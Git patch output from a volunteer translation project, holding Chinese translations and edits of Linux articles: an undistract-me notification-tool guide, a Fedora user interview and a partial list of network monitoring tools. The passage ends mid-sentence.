-[6]:https://www.ostechnix.com/install-yaourt-arch-linux/ -[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png -[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png diff --git a/translated/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md b/translated/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md new file mode 100644 index 0000000000..26a087d440 --- /dev/null +++ b/translated/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md @@ -0,0 +1,154 @@ +Undistract-me:当长时间运行的终端命令完成时获取通知 +============================================================ + +作者:[sk][2],时间:2017.11.30 + +![Undistract-me](https://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2-720x340.png) + +前一段时间,我们发表了如何[在终端活动完成时获取通知][3]。今天,我发现了一个叫做 “undistract-me” 的类似工具,它可以在长时间运行的终端命令完成时通知你。想象这个场景。你运行着一个需要一段时间才能完成的命令。与此同时,你查看你的 Facebook,并参与其中。过了一会儿,你记得你几分钟前执行了一个命令。你回到终端,注意到这个命令已经完成了。但是你不知道命令何时完成。你有没有遇到这种情况?我敢打赌,你们大多数人遇到过许多次这种情况。这就是 “undistract-me” 能帮助的了。你不需要经常检查终端,查看命令是否完成。长时间运行的命令完成后,undistract-me 会通知你。它能在 Arch Linux、Debian、Ubuntu 和其他 Ubuntu 衍生版上运行。 + +#### 安装 Undistract-me + +Undistract-me 可以在 Debian 及其衍生版(如 Ubuntu)的默认仓库中使用。你要做的就是运行下面的命令来安装它。 + +``` +sudo apt-get install undistract-me +``` + +Arch Linux 用户可以使用任何帮助程序从 AUR 安装它。 + +使用 [Pacaur][4]: + +``` +pacaur -S undistract-me-git +``` + +使用 [Packer][5]: + +``` +packer -S undistract-me-git +``` + +使用 [Yaourt][6]: + +``` +yaourt -S undistract-me-git +``` + +然后,运行以下命令将 “undistract-me” 添加到 Bash 中。 + +``` +echo 'source /etc/profile.d/undistract-me.sh' >> ~/.bashrc +``` + +或者,你可以运行此命令将其添加到你的 Bash: + +``` +echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .bashrc +``` + +如果你在 Zsh shell 中,请运行以下命令: + +``` +echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .zshrc +``` + +最后更新更改: + +对于 Bash: + +``` +source ~/.bashrc +``` + +对于 Zsh: + +``` +source ~/.zshrc +``` + +#### 配置 Undistract-me + +默认情况下,Undistract-me 会将任何超过 10 秒的命令视为长时间运行的命令。你可以通过编辑 /usr/share/undistract-me/long-running.bash 来更改此时间间隔。 + +``` +sudo nano /usr/share/undistract-me/long-running.bash +``` + +找到 “LONG_RUNNING_COMMAND_TIMEOUT” 变量并将默认值(10 秒)更改为你所选择的其他值。 + + [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] + +保存并关闭文件。不要忘记更新更改: + +``` +source ~/.bashrc +``` + +此外,你可以禁用特定命令的通知。为此,找到 “LONG_RUNNING_IGNORE_LIST” 变量并像下面那样用空格分隔命令。 + +默认情况下,只有当活动窗口不是命令运行的窗口时才会显示通知。也就是说,只有当命令在后台“终端”窗口中运行时,它才会通知你。如果该命令在活动窗口终端中运行,则不会收到通知。如果你希望无论终端窗口可见还是在后台都发送通知,你可以将 IGNORE_WINDOW_CHECK 设置为 1 以跳过窗口检查。 + +Undistract-me 的另一个很酷的功能是当命令完成时,你可以设置音频通知和可视通知。默认情况下,它只会发送一个可视通知。你可以通过在命令行上将变量 UDM_PLAY_SOUND 设置为非零整数来更改此行为。但是,你的 Ubuntu 系统应该安装 pulseaudio-utils 和 sound-theme-freedesktop 程序来启用此功能。 + +请记住,你需要运行以下命令来更新所做的更改。 + +对于 Bash: + +``` +source ~/.bashrc +``` + +对于 Zsh: + +``` +source ~/.zshrc +``` + +现在是时候来验证这是否真的有效。 + +#### 在长时间运行的终端命令完成时获取通知 + +现在,运行任何需要超过 10 秒或者你在 Undistract-me 脚本中定义的时间的命令 + +我在 Arch Linux 桌面上运行以下命令。 + +``` +sudo pacman -Sy +``` + +这个命令花了 32 秒完成。上述命令完成后,我收到以下通知。 + + [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] + +请记住,只有当给定的命令花了超过 10 秒才能完成,Undistract-me 脚本才会通知你。如果命令在 10 秒内完成,你将不会收到通知。当然,你可以按照上面的“配置”部分所述更改此时间间隔设置。 + +我发现这个工具非常有用。在我迷失在其他任务上时,它帮助我回到正事。我希望这个工具也能对你有帮助。 + +还有更多的工具。保持耐心! + +干杯! + +资源: + +* [Undistract-me GitHub 仓库][1] + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal-commands-complete/ + +作者:[sk][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://github.com/jml/undistract-me +[2]:https://www.ostechnix.com/author/sk/ +[3]:https://www.ostechnix.com/get-notification-terminal-task-done/ +[4]:https://www.ostechnix.com/install-pacaur-arch-linux/ +[5]:https://www.ostechnix.com/install-packer-arch-linux-2/ +[6]:https://www.ostechnix.com/install-yaourt-arch-linux/ +[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png +[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png From fe8423d9ceeac4937cf7afa33c3855929190ca0e Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Wed, 6 Dec 2017 20:00:27 -0500 Subject: [PATCH 0369/1627] move --- ...171204 30 Best Linux Games On Steam You Should Play in 2017.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md (100%) diff --git a/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md b/translated/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md similarity index 100% rename from sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md rename to translated/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md From bf1ea7f4add16a5c401bfb48c2a29162673fe2bf Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 7 Dec 2017 09:03:21 +0800 Subject: [PATCH 0370/1627] translating --- ...ring Back Ubuntus Unity from the Dead as an Official Spin.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md b/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md index 0e38373c3f..d50a3cdfc5 100644 --- a/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md +++ b/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md @@ -1,3 +1,5 @@ +translating---geekpi + Someone Tries to Bring Back Ubuntu's Unity from the Dead as an Official Spin ============================================================ From fce8b5278170fab547440db18d8ae42074993826 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Wed, 6 Dec 2017 20:18:29 -0500 Subject: [PATCH 0371/1627] translation request: Love Your Bugs --- sources/tech/20171112 Love Your Bugs.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171112 Love Your Bugs.md b/sources/tech/20171112 Love Your Bugs.md index bf79f27cf7..0404875a25 100644 --- a/sources/tech/20171112 Love Your Bugs.md +++ b/sources/tech/20171112 Love Your Bugs.md @@ -1,3 +1,5 @@ +yixunx translating + Love Your Bugs ============================================================ From eead636c96ef94637dfd3f1d2b2b1afa0f9862ea Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 7 Dec 2017 09:36:04 +0800 Subject: [PATCH 0372/1627] PRF:20171120 Mark McIntyre How Do You Fedora.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @zrszrszrs 恭喜你,完成了第一篇翻译! --- ...0171120 Mark McIntyre How Do You Fedora.md | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/translated/tech/20171120 Mark McIntyre How Do You Fedora.md b/translated/tech/20171120 Mark McIntyre How Do You Fedora.md index 4fe315eb07..3ce32fd266 100644 --- a/translated/tech/20171120 Mark McIntyre How Do You Fedora.md +++ b/translated/tech/20171120 Mark McIntyre How Do You Fedora.md @@ -1,43 +1,43 @@ -# [Mark McIntyre: 你是如何使用Fedora的?][1] - +Mark McIntyre:与 Fedora 的那些事 +=========================== ![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) -最近我们采访了 Mark McIntyre,谈了他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 +最近我们采访了 Mark McIntyre,谈了他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[系列文章的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。如果你想成为采访对象,请通过[反馈表][3]与我们联系。 ### Mark McIntyre 是谁? -Mark McIntyre 是一个天生的极客,后天的 Linux 爱好者。他说:“我在 13 岁开始编程,当时自学 BASIC 语言,我体会到其中的乐趣,并在乐趣的引导下,一步步成为专业的码农。”Mark 和他的侄女都是披萨饼的死忠粉。“去年秋天,我和我的侄女尽可能多地光顾了诺克斯维尔的披萨饼连锁店。 点击 [https://knox-pizza-quest.blogspot.com/][4] 可以了解我们的进展情况。”Mark 也是一名业余的摄影爱好者,并且在 Flickr 上 [发布自己的作品][5]。 +Mark McIntyre 为极客而生,以 Linux 为乐趣。他说:“我在 13 岁开始编程,当时自学 BASIC 语言,我体会到其中的乐趣,并在乐趣的引导下,一步步成为专业的码农。” Mark 和他的侄女都是披萨饼的死忠粉。“去年秋天,我和我的侄女开始了一个任务,去尝试诺克斯维尔的许多披萨饼连锁店。点击[这里][4]可以了解我们的进展情况。”Mark 也是一名业余的摄影爱好者,并且在 Flickr 上 [发布自己的作品][5]。 ![](https://fedoramagazine.org/wp-content/uploads/2017/11/31456893222_553b3cac4d_k-1024x575.jpg) -作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我用 Python 比较规律。但当我的工作变得更像是自动化工程师时, Python 用得就更频繁了。” +作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我经常使用 Python。由于我的工作变得更像是自动化工程师, Python 用得就更频繁了。” -McIntyre 自称是个书呆子,喜欢科幻电影,但他最喜欢的一部电影却不是科幻片。“尽管我是个书呆子,喜欢看《星际迷航》、《星球大战》之类的影片,但《光荣战役》或许才是我最喜欢的电影。”他还提到,电影《冲出宁静号》实属著名电视剧《萤火虫》的精彩后续。 +McIntyre 自称是个书呆子,喜欢科幻电影,但他最喜欢的一部电影却不是科幻片。“尽管我是个书呆子,喜欢看《星际迷航Star Trek》、《星球大战Star Wars》之类的影片,但《光荣战役Glory》或许才是我最喜欢的电影。”他还提到,电影《冲出宁静号Serenity》是一个著名电视剧的精彩后续(指《萤火虫》)。 Mark 比较看重他人的谦逊、知识与和气。他欣赏能够设身处地为他人着想的人。“如果你决定为另一个人服务,那么你会选择自己愿意亲近的人,而不是让自己备受折磨的人。” -McIntyre 目前在 [Scripps Networks Interactive][6] 工作,这家公司是 HGTV、Food Network、Travel Channel、DIY、GAC 以及其他几个有线电视频道的母公司。“我现在是一名系统工程师,负责非线性视频内容,这是全部媒体开展线上消费的计划。”他支持一些开发团队编写应用程序,将线性视频从有线电视发布到线上平台,比如亚马逊、葫芦。这些系统既包含预置系统,也包含云系统。Mark 还开发了一些自动化工具,将这些应用程序主要部署到云基础结构中。 +McIntyre 目前在 [Scripps Networks Interactive][6] 工作,这家公司是 HGTV、Food Network、Travel Channel、DIY、GAC 以及其他几个有线电视频道的母公司。“我现在是一名系统工程师,负责非线性视频内容,这是所有媒体要开展线上消费所需要的。”他为一些开发团队提供支持,他们编写应用程序,将线性视频从有线电视发布到线上平台,比如亚马逊、葫芦。这些系统既包含预置系统,也包含云系统。Mark 还开发了一些自动化工具,将这些应用程序主要部署到云基础结构中。 ### Fedora 社区 -Mark 形容 Fedora 社区是一个富有活力的社区,充满着像 Fedora 用户一样热爱生活的人。“从设计师到包装师,这个团体依然非常活跃,生机勃勃。” 他继续说道:“这使我对操作系统抱有一种信心。” +Mark 形容 Fedora 社区是一个富有活力的社区,充满着像 Fedora 用户一样热爱生活的人。“从设计师到封包人,这个团体依然非常活跃,生机勃勃。” 他继续说道:“这使我对该操作系统抱有一种信心。” -2002年左右,Mark 开始经常使用 IRC 上的 #fedora 频道:“那时候,Wi-Fi 在启用适配器和配置模块功能时,有许多还是靠手工实现的。”为了让他的 Wi-Fi 能够工作,他不得不重新去编译 Fedora 内核。 +2002 年左右,Mark 开始经常使用 IRC 上的 #fedora 频道:“那时候,Wi-Fi 在启用适配器和配置模块功能时,有许多还是靠手工实现的。”为了让他的 Wi-Fi 能够工作,他不得不重新去编译 Fedora 内核。 -McIntyre 鼓励他人参与 Fedora 社区。“这里有许多来自不同领域的机会。前端设计、测试部署、开发、应用程序包装以及新型技术实现。”他建议选择一个感兴趣的领域,然后向那个团体提出疑问。“这里有许多机会去奉献自己。” +McIntyre 鼓励他人参与 Fedora 社区。“这里有许多来自不同领域的机会。前端设计、测试部署、开发、应用程序打包以及新技术实现。”他建议选择一个感兴趣的领域,然后向那个团体提出疑问。“这里有许多机会去奉献自己。” -对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触 Fedora 时,他帮我搞定了一些 #fedora 支持频道中的安装补丁。” Ben 也鼓励 Mark 去做 Fedora [代表][7]。 +对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触 Fedora 时,他帮我搞定了一些 #fedora 支持频道中的安装补丁。” Ben 也鼓励 Mark 去做 Fedora [大使][7]。 ### 什么样的硬件和软件? -McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的,地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 +McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 ![](https://fedoramagazine.org/wp-content/uploads/2017/11/Screenshot-from-2017-10-26-08-51-41-1024x640.png) -Mark 现在将 Fedora 26 运行在他过去几个月装配的所有盒子中。当一个新版本正式发布的时候,他倾向于避开这个高峰期。“除非在它即将发行的时候,我的工作站中有个正在运行下一代测试版本,通常情况下,一旦它发展成熟,我都会试着去获取最新的版本。”他经常采取就地更新:“这种就地更新方法利用 dnf 系统升级插件,目前表现得非常好。” +Mark 现在将 Fedora 26 运行在他过去几个月装配的所有机器中。当一个新版本正式发布的时候,他倾向于避开这个高峰期。“除非在它即将发行的时候,我的工作站中有个正在运行下一代测试版本,通常情况下,一旦它发展成熟,我都会试着去获取最新的版本。”他经常采取就地更新:“这种就地更新方法利用 dnf 系统升级插件,目前表现得非常好。” -为了搞摄影,McIntyre 用上了 [GIMP][8]、[Darktable][9],以及其他一些照片查看包和快速编辑包。当不启用网络电子邮件时,Mark 会使用 [Geary][10],还有[GNOME Calendar][11]。Mark 选用 HexChat 作为 IRC 客户端,[HexChat][12] 与在 Fedora 服务器实例上运行的 [ZNC bouncer][13] 联机。他的部门通过 Slave 进行沟通交流。 +为了搞摄影,McIntyre 用上了 [GIMP][8]、[Darktable][9],以及其他一些照片查看包和快速编辑包。当不用 Web 电子邮件时,Mark 会使用 [Geary][10],还有[GNOME Calendar][11]。Mark 选用 HexChat 作为 IRC 客户端,[HexChat][12] 与在 Fedora 服务器实例上运行的 [ZNC bouncer][13] 联机。他的部门通过 Slave 进行沟通交流。 “我从来都不是 IDE 粉,所以大多数的编辑任务都是在 [vim][14] 上完成的。”Mark 偶尔也会打开一个简单的文本编辑器,如 [gedit][15],或者 [xed][16]。他用 [GPaste][17] 做复制和粘贴工作。“对于终端的选择,我已经变成 [Tilix][18] 的忠粉。”McIntyre 通过 [Rhythmbox][19] 来管理他喜欢的播客,并用 [Epiphany][20] 实现快速网络查询。 @@ -46,8 +46,8 @@ Mark 现在将 Fedora 26 运行在他过去几个月装配的所有盒子中。 via: https://fedoramagazine.org/mark-mcintyre-fedora/ 作者:[Charles Profitt][a] -译者:[zrszrs](https://github.com/zrszrszrs) -校对:[校对者ID](https://github.com/校对者ID) +译者:[zrszrszrs](https://github.com/zrszrszrs) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From a27c82b2254cb4f264df4785c3fd8d9be00b651a Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 7 Dec 2017 09:36:45 +0800 Subject: [PATCH 0373/1627] PUB:20171120 Mark McIntyre How Do You Fedora.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @zrszrszrs 文章发布地址:https://linux.cn/article-9119-1.html 你的 LCTT 专页地址:https://linux.cn/lctt/zrszrszrs --- .../20171120 Mark McIntyre How Do You Fedora.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171120 Mark McIntyre How Do You Fedora.md (100%) diff --git a/translated/tech/20171120 Mark McIntyre How Do You Fedora.md b/published/20171120 Mark McIntyre How Do You Fedora.md similarity index 100% rename from translated/tech/20171120 Mark McIntyre How Do You Fedora.md rename to published/20171120 Mark McIntyre How Do You Fedora.md From 9523efd34a083f9f9066333ef1ee7b6116d7c9e2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Thu, 7 Dec 2017 10:10:32 +0800 Subject: [PATCH 0374/1627] apply for translation --- .../tech/20170921 How to answer questions in a helpful way.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20170921 How to answer questions in a helpful way.md b/sources/tech/20170921 How to answer questions in a helpful way.md index 8a3601ed06..31d6be1046 100644 --- a/sources/tech/20170921 How to answer questions in a helpful way.md +++ b/sources/tech/20170921 How to answer questions in a helpful way.md @@ -1,3 +1,6 @@ + +translating by HardworkFish + How to answer questions in a helpful way ============================================================ From 9364f777e7f16c425f77b4f0370191243eb1c993 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Thu, 7 Dec 2017 11:35:31 +0800 Subject: [PATCH 0375/1627] Translated by qhwdw --- ...Best Network Monitoring Tools For Linux.md | 188 ------------------ ...Best Network Monitoring Tools For Linux.md | 127 ++++++++++++ 2 files changed, 127 insertions(+), 188 deletions(-) delete mode 100644 sources/tech/20171203 Best Network Monitoring Tools For Linux.md create mode 100644 translated/tech/20171203 Best Network Monitoring Tools For Linux.md diff --git a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md b/sources/tech/20171203 Best Network Monitoring Tools For Linux.md deleted file mode 100644 index aec39b9822..0000000000 --- a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md +++ /dev/null @@ -1,188 +0,0 @@ -Best Network Monitoring Tools For Linux -=============================== - - -Keeping control of our network is vital to prevent any program from overusing it and slows down the overall system operation. There are several - -**network monitoring tools** - -for different operating systems today. In this article, we will talk about - -**10 network monitoring tools for Linux** - -that will run from a terminal, ideal for users who do not use GUI or for those who want to keep a control of the network use of a server through from ssh. - -### Iftop - - [![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2] - -Linux users are generally familiar with Top. This tool is a system monitor that allows us to know in real time all the processes that are running in our system and can manage them easily. Iftop is an application similar to Top but specialized in the monitoring of the network, being able to know a multitude of details regarding the network and all the processes that are making use of it. - -We can obtain more information about this tool and download the necessary packages from the - -[following link][3] - -. - -### Vnstat - - [![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4] **Vnstat** - -is a network monitor that is included, by default, in most Linux distributions. It allows us to obtain a real-time control of the traffic sent and received in a period of time, chosen by the user. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link.][5] - -### Iptraf - - [![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6] **IPTraf** - -is a console-based, real-time network monitoring utility for Linux. (IP LAN) - Collects a wide variety of information as an IP traffic monitor that passes through the network, including TCP flags information, ICMP details, TCP / UDP traffic faults, TCP connection packet and Byne account. It also collects statistics information from the general and detailed interface of TCP, UDP,,, checksum errors IP not IP ICMP IP, interface activity, etc. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link.][7] - -### Monitorix - System and Monitoring Network - - [![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8] - -Monitorix is a lightweight free utility that is designed to run and monitor system and network resources with as many Linux / Unix servers as possible. An HTTP web server has been added that regularly collects system and network information and displays them in the graphs. It will track the average system load and its usage, memory allocation, disk health, system services, network ports, mail statistics (Sendmail, Postfix, Dovecot, etc.), MySQL statistics and many more. It is designed to control the overall performance of the system and helps in detecting faults, bottlenecks, abnormal activities, etc. - -​ - -Download and more - -[information here][9] - -. - -### Dstat - - [![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10] - -A monitor is somewhat less known than the previous ones but also usually comes by default in many distributions. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link][11] - -. - -### Bwm-ng - - [![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12] - -One of the simplest tools. It allows you to get data from the connection interactively and, at the same time, export them to a certain format for easier reference on another device. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link][13] - -. - -### Ibmonitor - - [![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14] - -Similar to the above, it shows network traffic filtered by connection interface and clearly separates the traffic sent from the received traffic. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link​][15] - -. - -### Htop - Linux Process Tracking - - [![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16] - -Htop is a much more advanced, interactive and real-time Linux tool for tracking processes. It is similar to the top Linux command but has some advanced features such as an easy-to-use interface for process management, shortcut keys, vertical and horizontal view of processes and much more. Htop is a third-party tool and is not included on Linux systems, you must install it using - -**YUM** - -(or - -**APT-GET)** - -or whatever your package management tool. For more information on installation, read - -[this article][17] - -. - -We can obtain more information about this tool and download the necessary packages from the - -[following link.][18] - -### Arpwatch - Ethernet Activity Monitor - - [![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19] - -Arpwatch is a program that is designed to control the resolution of addresses (MAC and changes in the IP address) of Ethernet network traffic in a Linux network. It is continuously monitoring the Ethernet traffic and records the changes in the IP addresses and MAC addresses, the changes of pairs along with the timestamps in a network. It also has a function to send an e-mail notifying the administrator, when a couple is added or changes. It is very useful in detecting ARP impersonation in a network. - -We can obtain more information about this tool and download the necessary packages from the - -[following link.​][20] - -### Wireshark - Network Monitoring tool - - [![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21] **[Wireshark][1]** - -is a free application that enables you to catch and view the information going forward and backward on your system, giving the capacity to bore down and read the substance of every parcel – separated to meet your particular needs. It is generally used to investigate arrange issues and additionally to create and test programming. This open-source convention analyzer is generally acknowledged as the business standard, prevailing upon what's coming to it's of honors the years. - -Initially known as Ethereal, Wireshark highlights an easy to understand interface that can show information from many diverse conventions on all real system sorts. - -### Conclusion - -​In this article, we have taken a gander at a few open source network monitoring tools. Because we concentrated on these instruments as the "best" does not really mean they are the best for your need. For instance, there are numerous other open source monitoring apparatuses that exist, for example, OpenNMS, Cacti, and Zennos and you need to consider the advantages of everyone from the point of view of your prerequisite. - -Additionally, there are different apparatuses that might be more good for your need that is not open source. - -​ - -What more network monitors do you use or know to use in Linux in terminal format? - --------------------------------------------------------------------------------- - -via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux - -作者:[​​LinuxAndUbuntu][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.linuxandubuntu.com -[1]:https://www.wireshark.org/ -[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png -[3]:http://www.ex-parrot.com/pdw/iftop/ -[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png -[5]:http://humdi.net/vnstat/ -[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif -[7]:http://iptraf.seul.org/ -[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png -[9]:http://www.monitorix.org -[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png -[11]:http://dag.wiee.rs/home-made/dstat/ -[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png -[13]:http://sourceforge.net/projects/bwmng/ -[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg -[15]:http://ibmonitor.sourceforge.net/ -[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png -[17]:http://wesharethis.com/knowledgebase/htop-and-atop/ -[18]:http://hisham.hm/htop/ -[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png -[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml -[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg diff --git a/translated/tech/20171203 Best Network Monitoring Tools For Linux.md b/translated/tech/20171203 Best Network Monitoring Tools For Linux.md new file mode 100644 index 0000000000..8fc2cd25e3 --- /dev/null +++ b/translated/tech/20171203 Best Network Monitoring Tools For Linux.md @@ -0,0 +1,127 @@ +Linux 中最佳的网络监视工具 +=============================== + +保持对我们的网络的管理,防止任何程序过度使用网络、导致整个系统操作变慢,对管理员来说是至关重要的。对不同的系统操作,这是有几个网络监视工具。在这篇文章中,我们将讨论从 Linux 终端中运行的 10 个网络监视工具。它对不使用 GUI 而希望通过 SSH 来保持对网络管理的用户来说是非常理想的。 + +### Iftop + + [![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2] + +与 Linux 用户经常使用的 Top 是非常类似的。这是一个系统监视工具,它允许我们知道在我们的系统中实时运行的进程,并可以很容易地管理它们。Iftop 与 Top 应用程序类似,但它是专门监视网络的,通过它可以知道更多的关于网络的详细情况和使用网络的所有进程。 + +我们可以从 [这个链接][3] 获取关于这个工具的更多信息以及下载必要的包。 + +### Vnstat + + [![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4] + +**Vnstat** 是一个缺省包含在大多数 Linux 发行版中的网络监视工具。它允许我们在一个用户选择的时间周期内获取一个实时管理的发送和接收的流量。 + +我们可以从 [这个链接][5] 获取关于这个工具的更多信息以及下载必要的包。 + +### Iptraf + + [![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6] + +**IPTraf** 是一个 Linux 的、基于控制台的、实时网络监视程序。(IP LAN) - 收集经过这个网络的各种各样的信息作为一个 IP 流量监视器,包括 TCP 标志信息、ICMP 详细情况、TCP / UDP 流量故障、TCP 连接包和 Byne 报告。它也收集接口上全部的 TCP、UDP、…… 校验和错误、接口活动等等的详细情况。 + +我们可以从 [这个链接][7] 获取这个工具的更多信息以及下载必要的包。 + +### Monitorix - 系统和网络监视 + + [![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8] + +Monitorix 是一个轻量级的免费应用程序,它设计用于去监视尽可能多的 Linux / Unix 服务器的系统和网络资源。一个 HTTP web 服务器可以被添加到它里面,定期去收集系统和网络信息,并且在一个图表中显示它们。它跟踪平均的系统负载、内存分配、磁盘健康状态、系统服务、网络端口、邮件统计信息(Sendmail、Postfix、Dovecot、等等)、MySQL 